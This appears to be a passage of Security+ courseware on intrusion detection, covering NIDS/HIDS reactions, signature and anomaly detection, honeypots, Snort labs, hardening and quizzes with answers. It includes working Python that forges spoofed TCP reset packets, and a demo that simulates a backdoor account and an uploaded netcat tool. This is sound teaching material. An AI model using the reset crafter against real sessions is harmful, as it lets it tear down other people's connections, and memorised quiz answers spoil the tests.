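    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, data_offset, rst_flag, 0, 0, 0)
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(tcp))   # TCP checksum covers a pseudo-header
    tcp = tcp[:16] + struct.pack("!H", _checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, ttl, 6, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", _checksum(ip)) + ip[12:]
    return ip + tcp

def parse_rst(pkt):
    """Decode the fields a sniffer (or a test) would check, and verify both checksums."""
    ihl = (pkt[0] & 0x0F) * 4
    src, dst = pkt[12:16], pkt[16:20]
    sport, dport, seq, _ack, _offs, flags = struct.unpack("!HHIIBB", pkt[ihl:ihl + 14])
    tcp = pkt[ihl:]
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(tcp))
    return {
        "src": ".".join(str(b) for b in src), "dst": ".".join(str(b) for b in dst),
        "sport": sport, "dport": dport, "seq": seq, "rst": bool(flags & 0x04),
        "ip_ok": _checksum(pkt[:ihl]) == 0, "tcp_ok": _checksum(pseudo + tcp) == 0,
    }

def accepts_reset(rcv_nxt, rcv_wnd, rst_seq):
    """RFC 793 receiver rule: honour the RST only if RCV.NXT <= SEG.SEQ < RCV.NXT + RCV.WND (mod 2**32)."""
    return (rst_seq - rcv_nxt) % (1 << 32) < rcv_wnd

if __name__ == "__main__":
    # Constructed session: attacker 203.0.113.9:4321 -> victim 192.168.2.10:80, victim expects seq 0x11223344.
    pkt = build_rst("203.0.113.9", "192.168.2.10", 4321, 80, 0x11223344)
    print(parse_rst(pkt))
    print("in-window reset accepted:", accepts_reset(0x11223344, 65535, 0x11223344))
    print("stale reset accepted:", accepts_reset(0x11223344 + 70000, 65535, 0x11223344))
```

The last line of the usage shows the failure mode from the text: if 70,000 bytes have flowed since the sensor read the sequence number, the reset lands outside the window and the victim ignores it. Sensors that implement this feature usually send a second, mirror-image reset to the attacker as well, and newer TCP stacks (RFC 5961) tighten the rule further by accepting only an exact RCV.NXT match and answering in-window resets with a challenge ACK, which is one more reason sensor resets are unreliable against a live session.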
Shunning

In shunning (also known as IDS blocking), the sensor connects to the firewall or a packet-filtering router from its management interface and configures filtering rules that block packets from the attacker. Proper authentication needs to be arranged to ensure that the sensor can securely log in to the firewall or router. Shunning is usually a temporary measure (the rules are typically left in place for a period of minutes or hours) that buys administrators time to respond; it is not typically a permanent countermeasure. Keep in mind that if the attacker has used a spoofed source address, the IDS sensor will actually block someone other than the attacker (the legitimate owner of the spoofed IP address).

Note: Shunning takes place after a triggering packet has been noted by the sensor. When that packet reaches the victim host, it can inflict damage before the filtering rule is in place.
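The bookkeeping behind a shun, as an added example written for this page rather than any vendor's implementation: each block carries an expiry so it lasts minutes rather than forever, a never-shun list keeps the sensor from cutting off addresses the organization cannot afford to lose, and a request to block an inside address that supposedly arrived from outside is treated as spoofed. The networks, times and the Cisco IOS access-list rendering are assumptions for the illustration.

```python
"""Added illustration of shun bookkeeping on the sensor side (not a vendor's code).

A ShunTable records the temporary deny rules a sensor pushes to a firewall or
router.  Every entry carries an expiry so a shun lasts minutes, not forever; a
never-shun list protects addresses whose loss would be a self-inflicted outage
(the management path, DNS, partner networks); and a source that claims to be an
inside address while arriving from outside is rejected as spoofed, since blocking
it would only hurt the legitimate owner.  Networks and times are constructed.
"""
import ipaddress

class ShunTable:
    def __init__(self, never_shun, inside_nets, default_ttl=15 * 60):
        self.never_shun = [ipaddress.ip_network(n) for n in never_shun]
        self.inside = [ipaddress.ip_network(n) for n in inside_nets]
        self.default_ttl = default_ttl
        self._blocks = {}        # ip_address -> expiry time (seconds)
        self.audit = []          # every rule change, for the administrators' post mortem

    @staticmethod
    def _within(ip, nets):
        return any(ip in n for n in nets)

    def request(self, src, now, from_outside=True, ttl=None):
        """Decide on a sensor's request to shun src. Returns 'blocked', 'protected' or 'spoofed'."""
        ip = ipaddress.ip_address(src)
        if self._within(ip, self.never_shun):
            return "protected"
        if from_outside and self._within(ip, self.inside):
            return "spoofed"
        expiry = now + (self.default_ttl if ttl is None else ttl)
        self._blocks[ip] = max(expiry, self._blocks.get(ip, 0))   # repeat hits extend, never shorten
        self.audit.append(("deny", str(ip), expiry))
        return "blocked"

    def is_blocked(self, src, now):
        ip = ipaddress.ip_address(src)
        return ip in self._blocks and self._blocks[ip] > now

    def expire(self, now):
        """Drop lapsed entries; returns the addresses whose deny rule must be removed from the device."""
        lapsed = sorted(ip for ip, exp in self._blocks.items() if exp <= now)
        for ip in lapsed:
            del self._blocks[ip]
            self.audit.append(("permit", str(ip), now))
        return [str(ip) for ip in lapsed]

    def acl_lines(self, now):
        """Render the live table as Cisco IOS extended ACL statements (illustrative syntax)."""
        live = sorted(ip for ip, exp in self._blocks.items() if exp > now)
        return ["access-list 120 deny ip host %s any" % ip for ip in live] + ["access-list 120 permit ip any any"]

if __name__ == "__main__":
    table = ShunTable(never_shun=["192.0.2.0/24", "198.51.100.53/32"], inside_nets=["192.168.0.0/16"], default_ttl=600)
    for src in ("203.0.113.9", "198.51.100.53", "192.168.2.10"):
        print(src, "->", table.request(src, now=1000))
    print("\n".join(table.acl_lines(now=1500)))
    print("expired:", table.expire(now=1600))
```

The spoof check is deliberately narrow: it only catches the case the sensor can prove (an inside address cannot legitimately originate from the outside interface). For any other source the sensor cannot tell a spoofed packet from a real one, which is exactly why the never-shun list and the short TTL exist.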
Do it!
B-1:
2 TCP resets operate by spoofing the IP addresses of the attacker and sending a TCP reset packet to the victim host. True or false?
True
3 With IP session logging, the sensor records traffic passing between the attacker and the victim. True or false?
True
4 The DMZ is a good location for IDS because the publicly reachable hosts located there will be under constant attack from the Internet. True or false?
True
5 In shunning, the sensor connects to the firewall or a packet-filtering router from what interface?
6 A NIDS that watches for connection attempts to a known or frequently attacked port uses _____________ detection.
port signature
Host-based IDS
Explanation

Host-based IDS are used to protect a critical network server containing sensitive information. Host-based IDS agents (the actual HIDS software) protect only the host on which they are installed. Like any application, host-based IDS agents use resources on the host server (disk space, memory, and processor time), which can have some impact on system performance. HIDS can detect intrusions by analyzing the logs of operating systems and applications, resource utilization, and other system activity. Host-based IDS are primarily used to protect only critical servers, because it is not practical or cost-effective to install them on all systems.

HIDS method of operation

Host-based intrusion detection products have a wealth of methods that can be employed to detect and stop intrusions. The more common techniques employed by modern HIDS products include:

- Auditing of logs, including system logs, event logs, security logs, and syslog (for Unix hosts).
- Monitoring of file checksums to identify changes.
- Elementary network-based signature techniques, including port activity.
- Intercepting and evaluating requests by applications for system resources before they are processed.
- Monitoring of system processes for suspicious activity.

Log files

Most HIDS products audit log files by monitoring changes to them. If a log file changes, the HIDS checks the new entry to see whether it matches any of its attack signature patterns. If the log entry does match an attack signature, the HIDS alerts administrators. Note that because logs reflect past events, log auditing cannot stop the action that set off the alarm from taking place.

File checksums

File checksums are similar to log file audits in that they detect past activity. Hashes are typically created only for critical system files that should change infrequently, if at all.
If frequently changing files are included in the file audit, the administrator will need to tune the IDS so that it does not generate alerts every time these files change. The tuning process teaches administrators which files they should expect to change and which should remain static. File checksum systems such as Tripwire can also be employed when full-fledged HIDS products are not available or practical for a particular environment. (Tripwire scans file systems and creates hashes of critical system files. The hashes are saved, and the program is periodically rerun to validate that the hash value for each file has not changed.) By employing such a product, administrators can be notified when an intrusion has occurred (because the attacker will almost certainly upload tools or change permissions to make access to the machine easier), and can be certain which files have been tampered with. The modified files can then be identified and refreshed from backups, which may eliminate the need to completely rebuild the server. For this to hold, the saved hashes (and the checking tool itself) must be kept where the intruder cannot alter them, such as on read-only media or a separate host; a baseline the attacker can rewrite proves nothing.
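A working Tripwire-style integrity check of the kind just described, written for this page as an added example rather than Tripwire's own code. It records size, permission mode and SHA-256 for every file under a root, re-walks the tree to report modified, added and removed files, and takes an ignore list so that files expected to change (here, logs) do not raise alerts. The directory layout and the simulated intrusion in demo() are constructed.

```python
"""Added Tripwire-style file integrity checker (an illustration, not Tripwire's code).

baseline() hashes every regular file under a root and records size, permission
mode and SHA-256; verify() re-walks the tree and reports modified, added and
removed files.  Paths matching an ignore list (here log files) are skipped, which
is the tuning step that keeps legitimately changing files from raising alerts.
The baseline is returned as JSON text so it can be written to read-only media or
copied off the host.  demo() runs a constructed intrusion scenario in a
temporary directory.
"""
import fnmatch
import hashlib
import json
import os
import shutil
import stat
import tempfile

def _digest(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def baseline(root, ignore=()):
    """Return JSON text: {relative path: {"size", "mode", "sha256"}} for every regular file."""
    entries = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if os.path.islink(full) or any(fnmatch.fnmatch(rel, p) for p in ignore):
                continue
            st = os.stat(full)
            entries[rel] = {"size": st.st_size, "mode": stat.S_IMODE(st.st_mode), "sha256": _digest(full)}
    return json.dumps(entries, sort_keys=True)

def verify(root, baseline_json, ignore=()):
    """Compare the tree with a stored baseline; a changed hash, size or mode counts as modified."""
    old, new = json.loads(baseline_json), json.loads(baseline(root, ignore))
    return {
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
    }

def _write(root, rel, data, mode="wb"):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, mode) as f:
        f.write(data)

def demo():
    """Constructed scenario: baseline a small tree, simulate an intrusion, verify."""
    root = tempfile.mkdtemp()
    try:
        _write(root, "bin/login", b"original login binary")
        _write(root, "bin/ls", b"ls binary")
        _write(root, "etc/passwd", b"root:x:0:0:root:/root:/bin/sh\n")
        _write(root, "log/messages", b"day 1\n")
        ignore = ("log/*",)                      # tuning: logs are expected to change
        saved = baseline(root, ignore)
        # Intrusion: trojaned login, extra UID-0 account, uploaded tool, deleted ls; plus normal log growth.
        _write(root, "bin/login", b"backdoored login binary")
        _write(root, "etc/passwd", b"toor:x:0:0::/:/bin/sh\n", mode="ab")
        _write(root, "bin/nc", b"netcat")
        _write(root, "log/messages", b"day 2\n", mode="ab")
        os.remove(os.path.join(root, "bin", "ls"))
        return verify(root, saved, ignore)
    finally:
        shutil.rmtree(root)

if __name__ == "__main__":
    print(demo())
```

Recording the permission mode alongside the hash matters: an attacker who turns an existing tool setuid without changing its contents leaves the hash intact, and only the mode comparison catches it.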
Host-based IDS are deployed by installing agent software on the system to be protected. There are two main types of host-based intrusion detection software: host wrappers (some of which are thought of as desktop or personal firewalls) and agent-based software. Either approach is much more effective at detecting trusted-insider attacks (so-called anomalous activity) than network-based ID, and both are relatively effective at detecting attacks from the outside. However, host wrappers do not have the ability to provide the in-depth, active monitoring measures that agent-based HIDS products have. Host wrappers tend to be inexpensive and deployable on all machines in the enterprise, while agent-based applications are more suited to single-purpose servers.

Examples of host wrappers are Internet Security Systems' BlackICE PC Protection and BlackICE Server Protection (formerly Network ICE's BlackICE Defender; www.iss.net). An example of a full-fledged agent HIDS product is McAfee's Entercept host-based IDS (mcafee.com/us/products/mcafee/host_ips/category.htm). These products have evaluation versions that can be downloaded and used on a trial basis.

HIDS active monitoring capabilities

When an attack is flagged, host-based IDS have a menu of options similar to that of network-based IDS. However, because the HIDS has access to the host's operating system, it has more power to end attacks with more certainty. Options commonly used by HIDS agents include:

- Log the event
- Alert the administrator
- Terminate the user login
- Disable the user account

Logs of an offending event that triggers a response from an agent are obviously useful for administrators to review when performing a post mortem on an attack. Administrators can be alerted through an IDS management console (an application responsible for receiving alarms from IDS agents), by e-mail, or by SNMP traps sent to a network management system.
The ability of host-based intrusion detection systems to stop attacks in progress by forcing the offending account to log off, or by disabling it altogether, is what makes host-based IDS an effective security tool and one that complements network-based IDS and firewalls. Those HIDS products with a high degree of OS integration, which can intercept requests for system resources, can go a step further by denying the offending process access to memory, processor time, and disk space altogether.
B-2:
2 In protecting applications, the host sensor agent monitors which areas of application activity? (Choose all that apply.)
A Program files
B Data files
C Registry settings
D Services
E Users
F All of the above
3 HIDS can stop an attack in progress by forcing the offending account to log off or disabling it altogether. True or false?
True
A Can verify success or failure of an attack by reviewing log entries.
B Monitor user and system activities.
C Protect against attacks that are not network based, such as physical attacks.
D Are not limited by switched infrastructures.
E React quickly to intrusions.
F All of the above.
This feature is often referred to as IDS shunning or blocking. Another option is for the active IDS to send a TCP reset to the victim host, using the spoofed IP address of the attacker, causing the attacking session to be torn down. The TCP reset is illustrated in Exhibit 12-3.

Although active systems might seem far superior because of their ability to block undesirable traffic, those features must be used with extreme care. Because IDS has not matured to the point where false positives are very low, enabling shunning on an IDS can cause legitimate traffic to be inadvertently blocked. Worse, attackers can turn the IDS into a denial-of-service tool: by sending attack traffic with spoofed source addresses, they can get legitimate users' IP addresses or whole subnets blocked from entering the network. Active IDS features tend to be used only in networks where the IDS administrator has carefully tuned the sensor's behavior to minimize the number of false positive alarms.
The relevant part of the signature definition, the content field, appears in bold type. Notice that it matches the sniffer trace. Snort examines every packet that enters its monitoring NIC and compares the data payload against this signature. If there is an exact match, then Snort alerts the administrator that it has identified an attack using a Back Orifice port scanner. Only attacks, and no benign traffic, should match the signatures; otherwise false alarms are generated.

The signature detection method is good at detecting known attacks, but requires that the sensor's database be maintained with current signatures; otherwise, new attacks are not detected. A well-crafted signature nearly always detects the attack it represents, but other packets might also match the signature and generate false alarms. When false positives occur, IDS administrators tune the sensor by carefully determining the cause of the alarm. If the alarm is irrelevant (as it would be if it represented a Windows exploit when the network has only Unix hosts), then the administrator can safely configure the sensor to ignore the signature. If the alarm is required, then the alarm's context would be modified to prevent a repeat occurrence. Most signature systems are easily customizable, and knowledgeable users can create their own signatures.

One problem with signature-based detection techniques is the large number of signatures required to detect misuse effectively. Since a separate signature is needed for each type of attack, a complete database of signatures can contain several hundred entries. The more signatures each passing packet must be compared against, the slower the NIDS sensor operates. If a sensor operates too slowly, it misses packets, and potentially misses attacks as well. Despite this challenge, signature-based intrusion detection is quite popular and works well in practice when configured correctly and monitored frequently.
Anomaly detection

Anomaly detection takes the opposite position from signature detection. Rather than operate from signatures that define misuse or attacks on the network, anomaly detection creates a model of normal use and looks for activity that does not conform to that model. The difficulty in anomaly detection is in creating the model of normal network activity (the use model). One method of creating the use model selects key statistics about network traffic to recognize normal activity. Unfortunately, too much statistical variation makes models inaccurate, and events classified as anomalies are not always malicious. For example, a company's employees might have the habit of returning to their desks and checking their e-mail immediately following a monthly departmental meeting. The resulting spike in activity is not normal for that time of the day or week, so the anomaly-based IDS might label it as a denial-of-service attempt against the mail server.
Another problem with anomaly-based detection is the inability to build the model on a completely clean network. Anomaly detection systems must create a normal use model by monitoring traffic on the specific network they will defend. However, the network might already contain malicious activity, especially if it has an Internet connection. Any use model created from such a network would implicitly treat that preexisting malicious activity as normal. Anomaly detection systems aren't as popular as signature detection systems because of the high false alarm rates created by inaccurate models of normal use.
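A statistical use model of the kind the two paragraphs above describe, as an added example written for this page and not any product's algorithm. The model is a per-hour-of-week mean and standard deviation of connection counts to a mail server, built from a constructed, deterministic history; an observation more than k standard deviations above its slot's mean is flagged. Both failure modes are reproduced: the post-meeting e-mail burst is flagged because the model never saw it, and an attacker who was scanning throughout the training period becomes part of "normal" and is never flagged. The traffic figures, slots and threshold are assumptions for the illustration.

```python
"""Added illustration of statistical anomaly detection (not any product's algorithm).

The use model is a per-hour-of-week mean and standard deviation of connection
counts to a mail server, built from a constructed, deterministic history.  An
observation is anomalous when it lies more than k standard deviations above its
slot's mean.  Both failure modes from the text are reproduced: a legitimate
post-meeting burst the model never saw is flagged, and an attack that ran while
the model was trained is absorbed into 'normal' and never flagged.
"""
import statistics
from collections import defaultdict

HOURS_PER_WEEK = 168

def constructed_history(weeks=8, poisoned_slot=None, poisoned_count=400):
    """Synthetic (slot, count) pairs: about 100 connections/hour in weekday office
    hours, about 5 otherwise, with a small deterministic jitter of -2..+2."""
    history = []
    for week in range(weeks):
        for slot in range(HOURS_PER_WEEK):
            day, hour = divmod(slot, 24)               # day 0 = Monday
            base = 100 if day < 5 and 8 <= hour < 18 else 5
            count = base + (week * 7 + slot) % 5 - 2
            if slot == poisoned_slot:
                count = poisoned_count                 # attacker active throughout training
            history.append((slot, count))
    return history

def build_model(history):
    """Return {slot: (mean, stdev)}; stdev is floored at 1.0 so a flat slot is not infinitely strict."""
    by_slot = defaultdict(list)
    for slot, count in history:
        by_slot[slot].append(count)
    return {slot: (statistics.fmean(c), max(statistics.pstdev(c), 1.0)) for slot, c in by_slot.items()}

def score(model, slot, count):
    """Standard score of an observation against its slot's model."""
    mean, stdev = model[slot]
    return (count - mean) / stdev

def is_anomalous(model, slot, count, k=3.0):
    """Only excess traffic is flagged here; a quieter-than-normal hour is not an attack signal."""
    return score(model, slot, count) > k

MONDAY_10 = 10      # slot for Monday 10:00, right after the monthly meeting
TUESDAY_03 = 27     # slot for Tuesday 03:00, where the training data was poisoned

if __name__ == "__main__":
    clean = build_model(constructed_history())
    print("normal Monday 10:00, 102 connections:", is_anomalous(clean, MONDAY_10, 102))
    print("post-meeting burst, 250 connections: ", is_anomalous(clean, MONDAY_10, 250))
    poisoned = build_model(constructed_history(poisoned_slot=TUESDAY_03))
    print("scanner still running at 400/hour:    ", is_anomalous(poisoned, TUESDAY_03, 400))
```

The poisoned model is the more dangerous of the two cases: the clean model would score 400 connections at 03:00 as hundreds of standard deviations above normal, but once that level is in the training data the same traffic scores zero. Training on a network that is already compromised does not just miss the current attacker; it teaches the sensor to ignore anyone who behaves like him.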
IDS vendor                       URL               Comments
Aladdin Knowledge Systems        ealaddin.com
Cisco Systems, Inc.              cisco.com
Computer Associates Intl.        ca.com
Cylant Technology                cylant.com        CylantSecure product purports to protect against even unknown types of attacks by preventing any anomalous server activity.
Enterasys Networks Inc.          enterasys.com     Dragon family includes network monitors, host-based IDS, and central console.
Internet Security Systems Inc.   iss.net           A major player in the market; provides integrated host- and network-based IDS.
Intrusion.com Inc.               intrusion.com     Offers SecureNet family of IDS products.
NFR Security                     nfr.com           Sentivist IDS monitors packet fragments and reassembled packets, and provides customization capabilities.
Snort                            snort.org         The home of the well-known open source IDS, Snort.
Sourcefire, Inc.                 sourcefire.com    Open source network intrusion detection software, including Intrusion Sensor and Snort.
Symantec Host IDS                www.symantec.com  Symantec Host IDS provides prevention, real-time monitoring and detection of security breaches.
TripWire Inc.                    tripwire.com      Based on the former freeware tool, product detects breaches by monitoring files for unauthorized changes.
C-1:

2 A system has been developed to classify intrusion detection systems based on how they detect malicious activity. What are the major categories?
A Signature detection
B Anomaly detection
C Abnormal detection
D Intrusion penetration
E All of the above

3 Which type of IDS can only take logging and alerting types of actions when an attack is identified?

4 What is a method of detecting intrusion in which the IDS analyze the information they gather and compare it to a database of known attacks?

6 Which method of IDS is best suited for detecting Trojan horses such as BackOrifice?
Topic D: Honeypots
This topic covers the following CompTIA Security+ exam objective:
#    Objective
3.4  Differentiate the following types of intrusion detection, be able to explain the concepts of each type, and understand the implementation and configuration of each kind of intrusion detection system: Honey Pots
Commercial honeypot    URL                                Comments
Decoy Server           symantec.com                       Decoy Server provides complete operating systems for attackers to interact with, and has good monitoring, data collection and notification capabilities.
Specter                specter.com                        An easy-to-use commercial honeypot designed to run on Windows, Specter can emulate several different operating systems, monitor every ICMP packet, TCP connection and UDP datagram, and has a variety of configuration and notification features.
PacketDecoy            palisadesys.com                    A commercial honeypot appliance with extensive detection and emulation capabilities.

Free honeypot          URL                                Comments
BackOfficer            nfr.com/resource/backOfficer.php   A free Windows-based honeypot, BackOfficer is extremely easy to use and runs on any Windows platform; a good beginner's honeypot.
Deception Toolkit      all.net/dtk/dtk.html               A collection of Perl scripts and C source code that emulate a variety of listening services, DTK's primary purpose is to deceive human attackers.
Honeyd                 www.honeyd.org                     Introduced a variety of new concepts, including the ability to monitor millions of unused IPs, IP stack spoofing, and to simulate hundreds of operating systems at the same time.
Honeynet                                                  Not a program, but an entire network of systems designed to be compromised.
User-Mode Linux (UML)                                     An open source solution that allows you to run multiple operating systems (and honeypots) at the same time, UML also has honeypot functionality, including the ability to capture the attacker's keystrokes from kernel space; UML allows you to create an entire honeynet on a single computer.
D-1:

Here's how

See the classroom setup instructions for the location of the download file. Students will have to work in pairs on this activity.

1 Download and install a copy of BackOfficer Friendly according to your instructor's directions
2 In the Taskbar, right-click the BackOfficer Friendly icon and choose Details
3 On the menu bar, choose Options (to view the Options menu)
4 What types of scans can be performed with this utility? (BackOfficer Friendly can listen for Back Orifice, FTP, Telnet, SMTP, HTTP, POP3 and IMAP2.)
5 Select Listen for Telnet
6 At your partner's computer, open a command window
7 Enter telnet
8 Enter o, followed by your partner's computer's IP address
9 At your own computer, observe what happens in the BackOfficer Friendly window
D-2:

Here's how

See the classroom setup instructions for the location of the download file.

1 Download and install SuperScan 4 according to your instructor's directions
2 With BackOfficer Friendly still active, enter your computer's IP address into the Hostname/IP box, then click the right arrow next to your IP address (to add the IP address as an address to be scanned)
3 Click the blue arrow toward the bottom of the window (to start the scan; you'll see the results being displayed in the field at the bottom of the screen)
4 Switch back to BackOfficer Friendly, if the window didn't already pop up during the scan (the SuperScan activity displays in the window)
IDS monitoring
It is an unpleasant fact that the IDS needs to be monitored. Early in their deployment, intrusion detection systems are likely to generate a high number of false positives; and though these decrease as the IDS is tuned, the alarms still need to be investigated to determine how to tune it. Later, when the IDS installation is mature, an IDS alarm is a serious event that requires a response. Some network operations centers have 24 by 7 monitoring, but operations staff rarely have the experience or skills to deal with an intrusion. To monitor the IDS effectively, organizations need well-documented monitoring procedures that detail actions for specific alerts. When operations personnel receive an IDS alert, they can refer to these procedures to determine whom to contact and what actions should be taken immediately, based on the type of alarm generated by the IDS.
E-1:
A Security Information Response Team
B System Information Response Team
C Security Incident Response Team
D None of the above

A Determine how the incident happened.
B Establish a process for avoiding further exploitations of the same vulnerability.
C Avoid escalation and further incidents.
D Assess the impact and damage of the incident.
E Recover from the incident.
F Update procedures as needed.
G Determine who was responsible (if appropriate and possible).
H All of the above.
Review questions
1 What is the defense in depth security strategy?
A multi-layered security approach that uses multiple techniques such as preventative technologies, security monitoring, and attack response to provide a robust security architecture.
2 Specify whether each of the following is a true or false positive or negative. Occurs when the IDS correctly identifies undesirable traffic.
True positive
3 False negatives imply that the IDS failed to detect an attack. True or false?
True
4 False positives happen when the IDS mistakenly reports certain benign activity as malicious. True or false?
True
5 What is the difference between host-based and network-based intrusion detection systems?
Network-based IDS (NIDS) monitor network traffic while host-based IDS (HIDS) monitor activity on a particular host machine.
8 What are the typical reaction types for network IDS reactions?
TCP resets, IP session logging, and shunning or blocking.
9 HIDS audit log files, monitor file checksums, evaluate requests by application for system resources, and monitor system processes for suspicious activities. True or false?
True
10 HIDS can only detect intrusions after the fact rather than proactively protecting the host. True or false?
False
B Honeypots should never use the normal operating system.
C Only real data is of interest to attackers, so phony data should never be used.
D Honeypots should only be placed outside the firewall.
17 Early on in their deployment, intrusion detection systems are likely to generate a high number of false negatives. True or false?
False. When first set up, they are likely to generate false positives.
18 A well-documented monitoring procedure specifies whom operations personnel should contact. Information about what to do about the intrusion is not included in this document. True or false?
False. The document does include this information.
19 Deployment of a honeypot is seen by some as entrapment and, according to them, is therefore unethical. True or false?
True
After completing this activity, you'll be able to use Snort to capture data packets, view the contents of the data packets, and create log files.

Note: The servers used in this activity will be referred to as Server-X and Server-Y. Please substitute the names of your servers for these names.

1 On Server-X, click Start, Run, and type cmd.
2 Click OK.
3 Type cd \snort\bin and press Enter.
4 Enter snort -W. You'll see a list of the available interfaces, each with a number assigned to it (1, 2, and so on).
5 Type snort -v -i followed by the number of the interface you want to listen to. For example, you might type snort -v -i 2 to listen to interface 2.
6 Press Enter. You'll see a screen similar to the one shown in Exhibit 12-4 below.

Exhibit 12-4: The Snort interface initialization screen

7 On Server-Y, click Start, Run, and type cmd.
8 Click OK.
9 Type ping Server-X and press Enter.
10 On Server-X, view the results, as shown in Exhibit 12-5. Notice the ECHO and ECHO REPLY.

Exhibit 12-5: A Snort ping capture

11 On Server-X, press Ctrl+C to stop the capture and view the statistics, as shown in Exhibit 12-6. Notice that the protocols used were ICMP and ARP.

Exhibit 12-6: Snort ping capture statistics

12 On Server-X, at the command line enter snort -v -d -i followed by the interface number to view the packet data as well as the headers.
13 On Server-Y, enter ping Server-X.
14 On Server-X, view the results. You'll see a screen similar to the one shown in Exhibit 12-7.
Exhibit 12-7: A Snort ping capture with data

15 On Server-X, press Ctrl+C.
16 On Server-X, enter snort -dev -l \snort\log -K ascii -i followed by the interface number to log results to a log file.
17 Ping Server-X from Server-Y.
18 On Server-X, press Ctrl+C.
19 Navigate to the C:\snort\log folder and examine the contents. Use Notepad to open the files in the subfolder(s).
20 Repeat Steps 1 through 19 above on Server-Y.
21 Close all windows.

Creating a Snort rule set

In this activity, you'll create a simple Snort rule to alert you when the ICMP protocol is used. After completing this activity, you'll be able to create a Snort rule set and test the rule set on the network.

Note: The servers used in this activity will be referred to as Server-X and Server-Y. Please substitute the names of your servers for these names.

1 Log on to Server-X as Administrator (if necessary).
2 Click Start, Run, and type notepad.
3 Click OK.
4 Enter the information shown in Exhibit 12-8.

Exhibit 12-8: A Snort rule set

5 Save the file as c:\snort\new.rules. Close Notepad.
6 Rename c:\snort\new.rules.txt (Notepad appends .txt) to c:\snort\new.rules. Accept the format change when prompted.
7 On Server-X, open a Command window.
8 At the command line, enter cd \snort\bin.
9 At the command line, enter snort -c \snort\new.rules -K ascii -l \snort\log -i followed by the interface number.
10 From Server-Y, open Internet Explorer and enter http:// followed by Server-X's IP address in the address box. Press Enter.
11 On Server-X, press Ctrl+C.
12 Navigate to the C:\snort\log folder.
13 In Server-Y's subfolder, examine the Web traffic logged in the TCP_*-80.ids files. It should look similar to Exhibit 12-9.
14 On Server-X, change to the c:\snort\bin directory and then enter snort -c \snort\new.rules -K ascii -l \snort\log -i followed by the interface number.
15 On Server-Y, ping Server-X.
16 On Server-X, press Ctrl+C.
17 Navigate to the C:\snort\log folder.
18 Examine the contents of the alert.ids file. It should look similar to the one shown in Exhibit 12-10.

Exhibit 12-10: A Snort ICMP traffic alert log

19 Repeat Steps 1 through 18 above on Server-Y.
20 Close all windows and log off Server-X and Server-Y.
practices, including firmware updates, access control lists, and configuration best practices.
C Harden application-layer services, such as Web, e-mail, FTP, DNS, file/print, DHCP, and database repositories, against attacks.
D Explain how to properly configure workstations and servers and implement personal firewall software and antivirus packages.
Security baselines
It's extremely important, therefore, for system administrators to protect the integrity and availability of operating systems from outside threats. Actions that could disrupt the functionality of a system can be categorized as follows:

- Attacks: intentional acts by malicious individuals, either to gain unauthorized access to user data and system resources or to compromise other targets.
- Malfunctions: hardware or software failures that may prevent a system from performing its tasks.
- Errors: unintentional acts, by external or internal users, that may adversely affect the functionality of a system.
Best practices
Although it's almost impossible to achieve complete security of a system when it's deployed as part of a network, IT managers can follow certain guidelines to safeguard the system from intruders. Following is a common list of best practices for operating system hardening:

- Identify and remove unused applications and services, which, if compromised, can reveal sensitive information about a system.
- Remove unused or unnecessary file shares.
- Implement and enforce strong password policies.
- Force periodic password changes.
- Remove or disable all expired or unneeded accounts.
- Limit the number of administrator accounts available.
- Set necessary privileges to ensure that resources are accessible on an as-needed basis.
- Set account lockout policies to discourage password cracking.
- Keep track of the latest security updates and hot fixes.
- Apply vendor-suggested upgrades and patches as they are made available.
- Back up the system on a periodic basis for restoration in case of emergency.
- Log all user account and administrative activity so you can conduct forensic analysis if the system is compromised.

Documentation

Keeping an external log of each critical system can increase system integrity and make future security-related maintenance much simpler. This hard log should include a list of all software and version numbers installed on the system. As users, groups, and access privileges are defined, and other critical decisions are made during the baselining process, they should be recorded in this document. Records of all backups and upgrades should also be maintained in this single reference. When a security patch is recommended for a certain combination of operating system and applications, you won't need to dig around in your active system to see whether it applies; simply refer to the paper logs. A recommended method is to use a composition book for each critical system. It's obvious when pages are removed (they never should be), and it's easy to take with you to analyze.
Do it!
A-1:

Here's how

See the classroom setup instructions for the location of the download file.

1 Log on to your server as Administrator
2 Download mbsasetup-en.msi according to your instructor's directions
3 Double-click the mbsasetup-en.msi file, then click Next
4 Select I accept the license agreement, then click Next
5 Click Next (to use the default folder)
6 Click Install
7 Click OK (to acknowledge that the installation has finished)
8 Click Start, then choose All Programs, Microsoft Baseline Security Analyzer 2.0 (to start the program)
(In the lower-left corner of the window.)
Security update information downloads from the Internet and the scan begins. Note that this process may take some time to complete.
The report shows what was scanned, the results of the scan, and how to fix any problems.
11 After the scan is complete, view the report
12 Close all windows
Do it!
A-2:
Deny data access to all users but a select few.
Identify and remove unused applications and services.
Implement and enforce strong password policies.
Limit the number of administrator accounts.

2 Which of the following are not actions that could disrupt the functionality of a system?
A
B
C
D

3 Which of the following three statements about OS/NOS hardening is not true?
A OS/NOS hardening includes removal of unnecessary programs.
B OS/NOS hardening includes application hardening.
C OS/NOS hardening includes applying or adding patches to the system kernel.
Security baselines
File systems

Explanation
File systems store data necessary to enable communication between an application and its supporting disk drives. File systems require special attention when you're securing the OS. Strong file-system security can not only stop inside file tampering but also stop hackers who have gained access to the system but not the files.

Access privileges
Operating systems provide the capability to set access privileges for files, directories, devices, and other data or code objects. Setting privileges and access controls protects information stored on the computer. Common privileges that can be set on files and directories are Read, Write, and Execute privileges. Denying Read access protects the confidentiality of information. Denying Write access protects the integrity of information from unauthorized modification. Restricting execution privileges of most system-related tools to system administrators can prevent users and attackers from making intentional or unintentional configuration changes that could damage security.
